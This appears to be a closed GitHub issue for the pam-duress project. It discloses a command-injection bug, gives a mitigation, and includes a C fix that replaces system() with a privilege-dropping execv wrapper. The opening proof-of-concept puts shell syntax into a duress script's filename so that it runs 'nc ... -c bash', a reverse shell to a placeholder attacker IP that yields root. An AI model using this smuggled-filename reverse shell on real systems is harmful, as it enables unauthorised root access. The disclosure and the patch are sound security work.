Closed by nuvious 3 years ago
Code injection confirmed:
```console
# On target machine as unprivileged user.
$> touch ~/.duress/'ls;"; nc [IP OF ATTACKING MACHINE] 4242 -c bash; echo "'
$> chmod 500 ~/.duress/'ls;"; nc [IP OF ATTACKING MACHINE] 4242 -c bash; echo "'
$> duress_sign ~/.duress/'ls;"; nc [IP OF ATTACKING MACHINE] 4242 -c bash; echo "'
Password:
Confirm:

# On attacking machine
$> nc -nlvp 4242 # Then log in on target machine via terminal, ssh, etc
whoami
root
```
Mitigation for anyone using this for now is to touch /home/USER/.duress and make it owned by root to prevent users from creating duress scripts. Other issues/feature requests will make running ~/.duress directories toggleable via config, and this issue will be resolved when setuid/setgid/setenv are implemented instead of system().
Below is the full text of the email sent with the patch. Part of the implementation is already in the PR #12. The remainder of the fix is to use setuid/setgid/setenv as opposed to using system(), which potentially provides a code-injection avenue.
(Untested) attempt to fix patch https://github.com/nuvious/pam-duress/pull/2 and remove avenues for improper shell quoting and unexpected code injection.
Implement our own analogue to system() which sets environ for PAMUSER and drops privs without parsing any of the user-modifiable values, guarding against unsafe input. As a side effect, this provides granular error handling for failed setenv, setuid, or setgid as opposed to overloading one system() call for it.
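An added example (not code from the pam-duress project or from the patch) of the system() replacement the email describes: fork, drop group then user privileges, set PAMUSER, and execv() the script path directly so the filename is never parsed by a shell. It assumes the script takes no arguments; the demo() function, its temp directory and the exit code 42 are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run the script at `path` as uid/gid with PAMUSER set, without handing the
 * path to a shell: execv() takes it as a literal filename, so metacharacters
 * in the name are never interpreted. Returns the script's exit status, or -1
 * if fork, the privilege drop, setenv or exec fails (126/127 from the child). */
int run_duress_script(const char *path, uid_t uid, gid_t gid, const char *user)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Child: drop group before user; on any failure, never run the script. */
        if (setgid(gid) != 0 || setuid(uid) != 0)
            _exit(126);
        if (setenv("PAMUSER", user, 1) != 0)
            _exit(126);
        char *const argv[] = { (char *)path, NULL };
        execv(path, argv); /* returns only on failure */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Demo (constructed sample): create a script whose name carries the same
 * shell syntax as the report above, run it as the current user and return
 * its exit status. Only the script body runs, so the result is 42. */
int demo(void)
{
    char dir[] = "/tmp/duress-demo-XXXXXX";
    char path[128];
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(path, sizeof path, "%s/ls;\"; echo INJECTED; echo \"", dir);
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fputs("#!/bin/sh\nexit 42\n", f);
    fclose(f);
    chmod(path, 0500);
    struct passwd *pw = getpwuid(getuid());
    int rc = run_duress_script(path, getuid(), getgid(), pw ? pw->pw_name : "unknown");
    unlink(path); rmdir(dir);
    return rc;
}
```

Running demo() as an unprivileged user works because setgid()/setuid() to one's own ids always succeed; as root the same function drops to the target user's ids before exec.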